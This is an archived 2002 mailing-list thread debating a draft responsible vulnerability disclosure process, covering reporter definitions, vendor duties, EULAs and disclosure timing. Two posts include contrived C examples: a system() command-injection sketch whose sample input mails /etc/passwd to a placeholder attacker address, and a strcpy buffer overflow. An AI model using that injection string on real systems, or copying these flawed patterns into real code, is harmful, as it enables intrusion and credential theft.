Mailing List Archive

Re: it's all about timing
>It is interesting that the people screaming loudest for some sort of
>order in the submission of bugs are in fact not bug hunters at
>all. Rather, a vocal group of academics intent on having their name on
>a draft or ratified document they came up with. Sure, some may have
>posted a few findings, but none are consistently doing so, and the bug
>hunters sure don't sound like they need someone else telling them what
>to do. You don't hear them crying out for order.
>
>Wonder why that is.

I think it's because there are more "consumers" of vulnerability
information than just other bug hunters, for example, people who want
to remove those bugs from their vulnerable systems. I would be very
interested in hearing the experience of bug hunters who are also
responsible for the security of large, diverse networks; they may see
this situation from both angles.

The audience for a security advisory includes individuals and
organizations with many different needs for security information.
Having some order to disclosure can make it easier for people to
identify the vulnerabilities that they care about, and to secure their
systems.

The audience includes:

- System administrators, who often need to manage or support dozens of
products

- Security administrators, who need to research and understand
hundreds of vulnerabilities across their enterprise, and who may not
fully understand all the products that have been deployed at their
enterprise.

- Vulnerability database maintainers, who need to research,
understand, and/or verify thousands of vulnerabilities. Since
databases are relied upon by many people, errors or inconsistencies
in your own advisories will be multiplied greatly.

For a list of some of the challenges in vulnerability database
maintenance, see my post at:
http://lists.netsys.com/pipermail/full-disclosure/2002-July/000568.html

- Vulnerability researchers, who may have specialized research
interests that require greater detail (or different types of detail)
than most of your audience.

- Potential customers, or the consultants that they rely on

- Existing customers who care about security issues but do not
regularly read advisories


Sysadmins and security admins often have time pressures that may make
it difficult for them to sift through "noisy" vulnerability
information - incomplete, inaccurate, etc. If an advisory is released
without a vendor patch, the admins then have to keep track of which
bugs are outstanding, and figure out which researchers they can trust
when there is no vendor patch.

One of the roles of vulnerability databases is to sift through the
"noise" and make it easier to access vulnerability information. But
since it's resource-intensive for experienced vulnerability database
maintainers to manage the noise, it seems reasonable to assume that
admins may have difficulty managing the same information... or at
least figuring out which information is actually correct. The job is
only going to get harder with the increasing de-centralization of
vulnerability information.

In my experience, the most informative and accurate security
advisories offer a mixture of the details that researchers provide,
along with the correct affected versions, the fix, and the actual
cause of the problem, which the vendor often knows best.
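To make that concrete, here is a rough sketch of the kind of
information I have in mind; the product, dates, and field labels
below are invented purely for illustration:

    Product / affected versions:  ExampleServer 2.0 through 2.3
    Flaw and cause:               unchecked length on the login banner
    Impact:                       remote code execution as the daemon user
    Fix / workaround:             upgrade to 2.4, or disable remote banners
    Disclosure history:           2002-06-01  vendor notified
                                  2002-06-20  fix confirmed by reporter
                                  2002-07-15  patch and advisory published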

High-quality information may not be needed by everyone, and some
people may not think it's important, but better information means
better security overall.

- Steve
Re: Re: it's all about timing [ In reply to ]


It is very unclear as to what it is that you are really after. Who are these people "Vulnerability researchers", whose label is this? Is this a profession of some sort?

Are these professionals now not adhering to some suitable reporting method where they do in fact alert the vendor in private, work with that vendor in private, and then release the advisory? Is this not the case already? If so, what is the need for this to be set out in stone?

Or do you mean the one-off vulnerability report, the one that some individual stumbles upon and sends it off to the lists? Are you trying to harness them? Do you think some standard set out on what to do with the reporting is going to trickle down to the individual man in the street and he's going to (a) know about it (b) be bothered to follow the method if he did?

Let us say you have two sets of bug hunters:

(a) Professionals. Certainly they know what they are doing, why they are doing it, and how best to leverage it to bring business to their company. They WILL report them the responsible way.

(b) One-off individuals who are fly-by-nighters. Find a bug, report it to a list, and see you later. No time, no interest to seek out some rule or protocol on how to report the bug. They have no interest in getting involved in some laborious process with a vendor. They can either do nothing with it or they can submit it to the nearest mailing list and be done with it.

(a) above doesn't need a guideline, and (b) above you have no hope of harnessing or educating, as the interest is simply not there.

Is there then a third set out there that needs this guidance everyone is hollering about?

On Fri, 2 Aug 2002 14:07:53 -0400 (EDT), full-disclosure@lists.netsys.com wrote:
>[snip...]
Re: Re: it's all about timing [ In reply to ]

Let me ask you this: who _exactly_ is bound by the END USER LICENSE AGREEMENT?

Why not have the vendor include in it, "if you find a bug in our product, you agree to inform us and us only until we resolve the issue"?

I come to your house and play on your machine. You are the party who installed the software and selected "I agree" when you installed that piece of software. Now I find a bug and do with it as I see fit. Is this correct?

I think one of the anti-virus companies tried to pull a similar stunt in the EULA, whereby accepting installation you were not allowed to write a review of their product without their permission. In New York or New Jersey possibly, the State's Attorney shot it down in two seconds. Cannot remember the vendor, McAfee or NAI or Symantec or something.

Anyway, in the scenario above where I use your machine and its installed software and find a bug, given there is that condition in the EULA to which you, the party who installed the software, agreed, am I now bound by it too?

On Fri, 2 Aug 2002 14:07:53 -0400 (EDT), full-disclosure@lists.netsys.com wrote:
>[snip...]
Re: Re: it's all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>It is very unclear as to what it is that you are really after. Who are
>these people "Vulnerability researchers", whose label is this?

It's an RFPolicy-ism. Alternate terms are "reporter" (which covers
"bug hunters" and "people from the press") and "notifier" (which is
probably more accurate than "researcher," because the notifier might
not be the person who discovered the issue). I'm leaning towards
"notifier."

>Are these professionals now not adhering to some suitable reporting
>method where they do in fact alert the vendor in private, work with
>that vendor in private, and then release the advisory? Is this not the
>case already?

Based on an informal study I've done of about 350 researcher reports
from early 2002, approximately 50% of the vulnerabilities were
released without notifying the vendor, and about 20% of those reports
included full exploit code. (NOTE: the data is presently incomplete,
but I hope to publish a full report in the future.)

But even in the case where the vendor is notified ahead of time, one
needs only to look at the recent HP/SnoSoft situation to see that
there are different opinions on how disclosure should happen. Going a
little further back, the ISS/Apache situation also demonstrated a
variety in how professionals handle vulnerability reporting. We may
agree on the general notion of "give vendors some warning," but when
you get down to the nitty gritty details - like *how much* warning,
and how much effort the researcher should make, and how the vendors
should respond - suddenly you realize that there's a lot of variety.

You speak of "harnessing" vulnerability researchers. A number of
people have said that the current RVDP draft asks too much of
researchers, including Georgi Guninski and Rain Forest Puppy (and some
vendors). That feedback will be taken into account in the next
version.

In the meantime, the current RVDP draft already has a number of
suggestions for vendors:

3.3.1 Vendor Responsibilities

1) The Vendor MUST make it as easy as possible for Reporters,
Coordinators, Customers, and the Security Community to notify the
Vendor of vulnerabilities.

as well as:

3) The Vendor SHOULD ensure that its staff knows how to recognize a
reported security issue and direct it to the Security Response
Capability. This recommendation applies to staff who provide support
online, over the telephone, in person, or through some other means by
which reporters may interact with the Vendor.

as well as:

6) The Vendor MUST provide a facility for individuals or
organizations who are not Customers to report vulnerabilities. The
Vendor SHOULD NOT require (1) an active technical support number, (2)
telephone access that is not toll-free, or (3) user registration for
a web site or other facility that would be used for reporting.


If more vendors follow the recommendations in the current draft, it
will be easier for people to report vulnerabilities to them, which I
think is a good thing.


>Or do you mean the one-off vulnerability report, the one that some
>individual stumbles upon and sends it off to the lists?

If the one-off person knows about security-related mailing lists, then
hopefully they'll know something of disclosure issues.

>Are you trying to harness them? Do you think some standard set out on
>what to do with the reporting is going to trickle down to the
>individual man in the street and he's going to (a) know about it (b)
>be bothered to follow the method if he did?

If there is enough awareness of disclosure issues in the IT community,
then hopefully this won't happen as much. However, as you say, there
will always be people who won't follow the disclosure guidelines.

You may be surprised to learn that the RVDP draft specifically tells
vendors that they should be prepared for such a situation:

3.3.1 Vendor Responsibilities

7) The Vendor SHOULD recognize that inexperienced or malicious
reporters may not use proper notification, and define its own
procedures for handling such cases.


I've mentioned at least 4 vendor requirements from the current draft,
which would make the notification process easier for researchers.

>Is there then a third set out there that needs this guidance everyone
>is hollering about?

I think so, and that's the people who are somewhere in between - maybe
they're not professionals, but maybe they like to do research for fun,
to analyze the software they use themselves, to build a resume,
whatever (and before someone misinterprets what I just said, I
personally don't think that there's anything wrong with doing research
for resume-building). Sometimes, it seems that researchers start out
by releasing advisories without notifying the vendor, then as they
gain experience, they work with the vendor more and more. But I don't
have any hard numbers to back that up. Indeed, the whole area of
disclosure is woefully short of hard numbers.

- Steve
Re: Re: it's all about timing [ In reply to ]
In the profound words of Steven M. Christey:
>
[snip...]
> If there is enough awareness of disclosure issues in the IT community,
> then hopefully this won't happen as much. However, as you say, there
> will always be people who won't follow the disclosure guidelines.
>
> You may be surprised to learn that the RVDP draft specifically tells
> vendors that they should be prepared for such a situation:
>
> 3.3.1 Vendor Responsibilities
>
> 7) The Vendor SHOULD recognize that inexperienced or malicious
> reporters may not use proper notification, and define its own
> procedures for handling such cases.

Why must they automatically be labelled either "inexperienced"
or "malicious", if they don't choose to follow the chosen guidelines??
Suppose they simply disagree with those guidelines? They may feel
it's not THEIR job to spend a large portion of their time trying to
educate the vendor about their own broken software... They may feel
they have no obligations in that area, at all... They may simply
be releasing the information to the public out of pure good will,
when they could have instead simply kept it to themselves, leaving
everyone still at risk to the issue, and completely ignorant of it...
Surely you wouldn't think THAT is a preferable situation to informing
the public without prior vendor notification? Because, if you start
throwing such labels around, that's precisely what such people will
do... And, *I*, for one, really would prefer to be informed, rather
than remain in the dark; and, to hell with the software vendor! At
least if I know about a problem, I can take steps to protect myself,
even if the vendor can't/won't...

So, if you're still modifying this "policy", I would really
suggest changing that language... Just drop the whole labelling
of such people, and simply say something like, "Some reporters
may not follow these guidelines for notification."... No judging
them or their reasons for doing so... Not everyone is going to
agree with you, no matter WHAT you come up with; and, negatively
labelling all those who don't agree is really not very nice, and
in this case, would be highly counter-productive, I think...

Basically, I don't think any bug-reporter should EVER be
attacked, no matter what policy they followed (if any)... Remember,
they are doing this on their own time... They don't have to tell
anyone at all... Be thankful they are telling the public at all,
rather than bitch about HOW they choose to do so... (Yes, yes,
I think most people will agree it would be BEST to do things a
certain way... And, that would be really NICE if everyone did
that... But, it shouldn't be any kind of requirement, where
everyone who doesn't do it is an instant asshole... Not everyone
always has time/desire/whatever to be the nicest and most polite
they possibly can be... And, we shouldn't go around trying to
codify exactly HOW nice and polite everyone MUST be...)

--
||========================================================================||
|| Rob Seace || URL || ras@magrathea.com ||
|| AKA: Agrajag || http://www.magrathea.com/~ras/ || rob@wordstock.com ||
||========================================================================||
"Can we drop your ego for a moment? This is important." "If there's anything
more important than my ego around, I want it caught and shot now." - THGTTG
Re: Re: it's all about timing [ In reply to ]
All these proposals for responsible vulnerability reporting have, in my
eyes, a major problem: the vendors. I can't count the times I see folks
asking in various lists "how do I contact such-and-such vendor to report
an issue", and I long ago quit counting the times I've seen vulnerability
reports in the various lists where the vendor had not responded, or their
response was like M$'s tends to be, "we do not consider this a
vulnerability nor a serious issue", when in fact it is. How many times
now has M$ changed its vulnerability/security issue reporting
address/procedures? I think those finding and discovering these issues
would be more willing to work within a responsible structure if the
vendors would adopt a responsible attitude and process on their end.
After all, what the vendors receive is free information and debugging on
their product(s)/code, free research, and the man-hours of countless
folks, which costs them nothing - no paychecks, no benefits to pay out,
not even unemployment insurance - if they would act responsibly to begin
with. After all, there was a reason full disclosure and the various
lists came to be in the first place: frustration due to vendors not
taking a responsible attitude towards both the code/products they push
to market and their customers.

Thanks,

Ron DuFresne



On Fri, 2 Aug 2002, Steven M. Christey wrote:

> [snip...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
Re: Re: it's all about timing [ In reply to ]

Having just read that article, it seems like nothing more than guesswork.

"security advisory"
"vulnerability researchers"

What are the definitions for these?

Most of the time the vendor discounts a finding as being nothing more than a bug. No security implications. Then someone else takes it and manages to do something with it that does have security implications. Then again, what is the definition of "security"? For a vulnerability researcher, unless this is now a trade and a recognised job title with certification from some "school", who or what exactly is that?

Joe Six-Pack installs a piece of software, he finds that pressing 1,2,3 on the keyboard at the same time deletes his hard drive. Thinks that's mighty unusual. Tells Joe 12-Pack, who tells him there is some mailing list you can send bugs to called bugtraq, so he posts it there. Knows nothing about anything. Certainly isn't a "vulnerability researcher" and certainly hasn't posted a "security advisory". Doesn't know what he has and doesn't know what he is doing. Is the vendor going to come after them and sue them?

Then on the other hand, you have some major vendors who go out of their way to discount what someone else finds as being nothing more than a "bug", that someone else follows the procedures, creates what they think is a "security advisory" and nothing gets fixed. A series of insurmountable hurdles or mitigating factors make it a bug and not a security matter at all. Hurdles like being enticed to visit websites on the internet or being enticed to click on links in emails. Someone else may take that publicised info and re-work it so that the hurdles are overcome; it may be a succession of 10 individuals, each inputting one step closer. Should all this be funnelled to the vendor when they've already dismissed the original as nothing more than a bug?

Two bad examples, but someone is going to have to define what a vulnerability is, what a security advisory is and what vulnerability researchers are.



On Thu, 1 Aug 2002 01:45:46 -0400 (EDT), full-disclosure@lists.netsys.com wrote:
>The Responsible Disclosure Process draft specifically allows for
>researchers to release vulnerability information if the vendor is not
>sufficiently responsive. Some people may disagree with the delay of
>30 days between initial notification and release, but I don't think
>there are good stats on how long it really takes vendors to fully
>address vulnerability reports - open or closed source, freeware or
>commercial. Let's take a recent example - how much coordination had
>to happen for the zlib vulnerability? It seems reasonable to assume
>that it took more than a day. And the controversial "grace period"
>has the interesting distinction of being used by both Microsoft and
>Theo de Raadt.
>
>Researchers can help to shed light in this area by publishing
>disclosure histories along with their advisories. (By the way, vendor
>advisories rarely include such information.)
>
>While the response to the proposal focused almost exclusively on how
>it impacts researchers, it lays out a number of requirements for
>vendors, primarily that they (a) make it easy for people to file
>vulnerability reports, (b) be responsive to incoming vulnerability
>reports, and (c) address the issues within a reasonable amount of
>time.
>
>IMHO, it makes a stronger impression when someone releases a security
>advisory with an extensive disclosure history that says how much they
>tried to resolve the issue with the vendor, before they released.
>
>Those who are interested in the legal aspects of "responsible
>disclosure" are encouraged to read the article by Mark Rasch at
>http://online.securityfocus.com/columnists/66. The article basically
>says that the adoption of community standards could protect
>researchers who disclose issues responsibly, while it could also help
>vendors who seek legal recourse against researchers who are not
>responsible (for some definition of "responsible"). The former could
>happen with a community standard. The latter may already be happening
>without one.
>
>This email is my personal opinion, not my employer's.
>
>- Steve
>(co-author of the aforementioned Responsible Disclosure proposal,
>which is presently quiet but not dead, but will always be subject to
>public feedback)
Re: Re: it's all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>"security advisory"
>"vulnerability researchers"
>
>What are the definitions for these?

While "security advisory" implies a structured, comprehensive
vulnerability report, in general I mean any report of an issue with IT
security implications. SnoSoft's initial publication of the HP su
issue wasn't an advisory per se, but it was a vulnerability report.

I use "vulnerability researchers" more out of habit than anything; as
you say:

>For a vulnerability researcher, unless this is now a trade and a
>recognised job title with certification from some "school", who or
>what exactly is that? Joe Six-Pack installs a piece of software, he
>finds that pressing 1,2,3 on the keyboard at the same time deletes
>his hard drive. Thinks that's mighty unusual. Tells Joe 12-Pack, who
>tells him there is some mailing list you can send bugs to called
>bugtraq, so he posts it there. Knows nothing about anything. Certainly
>isn't a "vulnerability researcher" and certainly hasn't posted a
>"security advisory".

It's situations like these that caused us to try the term "reporter"
in the RVDP draft, as in "person/entity who reports the issue." But
as mentioned in another post, I'm leaning more towards "notifier."

>Doesn't know what he has and doesn't know what he is doing. Is the
>vendor going to come after them and sue them?

Hopefully not, but it appears that you and I disagree on whether
disclosure standards will help or hurt the situation.

>Then again, what is the definition of "security"?

I think we'd need a whole new list for that ;-)

>Then on the other hand, you have some major vendors who go out of
>their way to discount what someone else finds as being nothing more
>than a "bug", that someone else follows the procedures, creates what
>they think is a "security advisory" and nothing gets fixed.

The RVDP draft tries to recognize that there can be technical
disagreements, but short of recommending that a third-party
coordinator "negotiate," we don't really try to address the issue.
On the other hand, third parties such as w00w00 have proven effective
in the past.

As you have been describing in your posts, there are a number of
complex issues related to disclosure.

>A series of insurmountable hurdles or mitigating factors make it a bug
>and not a security matter at all. Hurdles like being enticed to visit
>websites on the internet or being enticed to click on links in
>emails. Someone else may take that publicised info and re-work it so
>that the hurdles are overcome; it may be a succession of 10
>individuals, each inputting one step closer. Should all this be
>funnelled to the vendor when they've already dismissed the original as
>nothing more than a bug?

If the vendor disagrees with the severity, then it seems reasonable
for the "notifier" to include the vendor's point of view in their
public "advisory." Then, as you point out, follow-on discussion may
reveal additional implications of the issue.

>Two bad examples, but someone is going to have to define what a
>vulnerability is

That's not particularly easy. Everybody has different definitions,
partially due to different levels of "risk aversion."

>what a security advisory is and what vulnerability researchers are.

The current short definition of "reporter/notifier" is:

A [Reporter/Notifier] is the individual or organization that
informs (or attempts to inform) the Vendor of the vulnerability.
Note that the [Reporter/Notifier] may not have been the initial
discoverer of the problem.

The current draft doesn't include any definition of "security
advisory," so that will need to be addressed.

Thanks,
- Steve
Re: Re: it's all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>Who is doing who the favor? Someone who spends hundreds or thousands
>of dollars and finds a problem in that vendor's product? Or the
>vendor, for allowing you, the customer, to buy their product? You
>should be honored to give your hard-earned money to me, the
>vendor. Here, take my product and tough shit if it doesn't work well.
>
>How about fuck the vendor. Find a bug, post away 0-day? Or give me my
>money back for the defective product you sold me, plus compensation
>for the time and effort it took me to fix the problems your software
>caused on my machine.

I'm just curious, do people on this list think that freeware vendors
should be treated differently than this? Do you think they should be
given more (or less) time to address the issues? How about commercial
vendors whose products are open source? How much does a vendor's past
performance (or the perception of past performance) come into play?

- Steve
Re: Re: it's all about timing [ In reply to ]
"Robert A. Seace" <ras@slartibartfast.magrathea.com> said:

>> 3.3.1 Vendor Responsibilities
>>
>> 7) The Vendor SHOULD recognize that inexperienced or malicious
>> reporters may not use proper notification, and define its own
>> procedures for handling such cases.
>
> Why must they automatically be labelled either "inexperienced"
>or "malicious", if they don't choose to follow the chosen guidelines??
>Suppose they simply disagree with those guidelines? They may feel
>it's not THEIR job to spend a large portion of their time trying to
>educate the vendor about their own broken software...
>
>... if you're still modifying this "policy", I would really
>suggest changing that language... Just drop the whole labelling
>of such people, and simply say something like, "Some reporters
>may not follow these guidelines for notification."...

Good point, duly noted.

Many of the items in the draft try to give a rationale for why the
item is there. In this case, the rationale is mixed with the
recommendation, and as you point out, it's incomplete anyway. There
are a number of reasons why someone may not use "proper" notification.

Thanks,
- Steve
Re: Re: it's all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>What are the penalties now for not abiding by this guideline, or any
>other guideline that might be out there?

We explicitly stayed away from defining what the penalties are.
That's outside the scope of the recommendations - the "marketplace"
may decide, or perhaps the legal community may decide. If there are
no guidelines at all, then perhaps "the government" will decide (which
obviously has its own issues in an international community such as
information security).

>Pretend that your (as in this) guideline was already implemented. How
>on earth would you expect it to have stifled the release by both the
>individual in (or a part of) SnoSoft and ISS?

It at least establishes a point of discussion. Whether you agree with
the particular points of the draft or not, they can be compared to the
facts (or apparent facts) of the situation.

For the ISS/Apache issue, it seems that nobody disputes that ISS gave
Apache less than 7 days to respond to the initial report, before they
published. This is not consistent with the spirit of the disclosure
draft (I just took a look at it, and while it requires the vendor to
respond within 7 days, it doesn't have a complementary suggestion that
the reporter should give 7 days to the vendor! whoops). In the
ISS/Apache case, we have the further complication that multiple
vendors were involved (a difficult issue that is not addressed by the
current draft, except in its recommendations for involving
coordinators). Without community-defined guidelines, there are no
clear boundaries to say whether ISS did things "reasonably" or not.

The SnoSoft/HP issue is more complicated and not cleanly addressed by
the disclosure draft, which does not cover accidental or unauthorized
releases, and is not comprehensive on the role of third party
coordinators. I think it demonstrates some of the complexity in
vulnerability disclosure. Some people have argued that this means
that there shouldn't be *any* guidelines, but I believe that we should
try to be as detailed as possible in the guidelines to reduce
confusion, provide flexibility where it is needed, and do what is
possible to avoid regulations that may come from outside the IT
community.

- Steve
Re: Re: it's all about timing [ In reply to ]
choose.a.username@hushmail.com said:

>>Based on an informal study I've done of about 350 researcher reports
>>from early 2002, approximately 50% of the vulnerabilities were
>>released without notifying the vendor, and about 20% of those reports
>>included full exploit code
>
>Your informal study of 50% of 350 researcher reports. What exactly
>does that mean?
>
>How many of those released were one-offs? 1 person never to be seen
>from again. How many of them were "repeat offenders" 10 of the same
>people releasing the bulk of them?

Unfortunately, I don't have that information, as the discloser's
identity was not collected (I was mostly interested in the disclosure
"timelines".) But that's a good question...

>Your number 6 below:
>
>"The Vendor MUST provide a facility for individuals or
> organizations who are not Customers to report vulnerabilities"
>
>This to me sounds like it is acceptable that there are going to be
>vulnerabilities. Continue cranking out shodware because we have a set
>of guidelines that people who stumble across them are expected to
>adhere to.

Vulnerabilities will happen, even in the best of circumstances, as
long as new types of vulnerabilities are discovered. If there are 20
individuals who decide to audit a package for a new type of
vulnerability, but the vendor only has 5 developers, then it seems
like there's a good chance that someone other than the vendor will
discover the issue. Then you've got "interaction" vulnerabilities,
which I loosely define as when a vulnerability occurs in the way that
two products interact with each other. Developers can't always
predict how their product will be used, or how it will interact with
other products, so interaction-based vulnerabilities may be around in
one form or another.
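
To illustrate what I mean by an interaction issue, here is a
contrived sketch - the code is invented for illustration and is not
taken from any real product. A helper was written assuming a trusted
caller, and a front-end later reuses it with untrusted input:

    /* viewer.c - written on the assumption that "filename" comes
     * from a trusted local user, so shell metacharacters were never
     * a concern. */
    #include <stdio.h>
    #include <stdlib.h>

    static void show_file(const char *filename)
    {
        char cmd[512];

        /* builds a shell command line from its argument */
        snprintf(cmd, sizeof(cmd), "/bin/cat %s", filename);
        system(cmd);
    }

    int main(int argc, char **argv)
    {
        /* Now imagine argv[1] is wired to a field on a web form:
         * "report.txt; mail cracker@example.org < /etc/passwd" does
         * considerably more than view a report.  Neither component
         * is "wrong" on its own; the vulnerability is in the
         * interaction. */
        if (argc > 1)
            show_file(argv[1]);
        return 0;
    }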

Given the likelihood of vulnerabilities in a "perfect" world, it seems
reasonable that the vendor should be prepared to respond to incoming
reports.

>Why not draft a guideline for the release of software onto the
>internet? Security guidelines (defaults of configs, etc.) and quality
>guidelines (vendor (a) is a known creator of crudware, etc.). If you
>want to connect to the internet or peddle your internet-connected
>wares, you the vendor must follow these guidelines. Penalise them if
>they fail. Fine them real money if they repeat.

This is a very interesting proposal if I understand what you're
saying, but it's outside the scope of a disclosure process document.

I can't think of any document that specifically says "use
secure-by-default" (and defines what that means), "avoid buffer
overflows," "conduct third-party evaluation of product design," "make
security-based patching and configuration easy" (and try to define
*that* :-), etc. Such a document might be useful for less-technical
customers to ask their vendors to make more secure products. I
suspect that many customers want security, but they don't know how to
ask for it.

- Steve
Re: Re: it's all about timing [ In reply to ]
[SNIP]

> >Your number 6 below:
> >
> >"The Vendor MUST provide a facility for individuals or
> > organizations who are not Customers to report vulnerabilities"
> >
> >This to me sounds like it is acceptable that there are going to be
> >vulnerabilities. Continue cranking out shodware because we have a set
> >of guidelines that people who stumble across them are expected to
> >adhere to.
>
> Vulnerabilities will happen, even in the best of circumstances, as
> long as new types of vulnerabilities are discovered. If there are 20
> individuals who decide to audit a package for a new type of
> vulnerability, but the vendor only has 5 developers, then it seems
> like there's a good chance that someone other than the vendor will
> discover the issue. Then you've got "interaction" vulnerabilities,
> which I loosely define as when a vulnerability occurs in the way that
> two products interact with each other. Developers can't always
> predict how their product will be used, or how it will interact with
> other products, so interaction-based vulnerabilities may be around in
> one form or another.


But seriously, what's new about buffer overflows, which are the main cause
of vulns in software now as they were in the 1980's and prior, when the
Morris worm hit [1]? How about repeat issues with the same products, like
the M$ SQL Server issues (not that M$ is the only vendor with products
that sink time and again)?
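
The pattern itself certainly hasn't changed; a minimal, contrived
sketch of the classic mistake (invented for illustration, not taken
from any particular product):

    #include <string.h>

    void greet(const char *name)
    {
        char buf[64];

        /* no bounds check: anything longer than 64 bytes overruns
         * buf and tramples the stack, same as it did in 1988 */
        strcpy(buf, name);
    }

    int main(int argc, char **argv)
    {
        if (argc > 1)
            greet(argv[1]);   /* argv[1] can be arbitrarily long */
        return 0;
    }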


What 'new types of vulnerabilities' are being discovered?


[SNIP]


Thanks,

Ron DuFresne
[1] http://sysinfo.com/iworms.html (our shameless plug)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.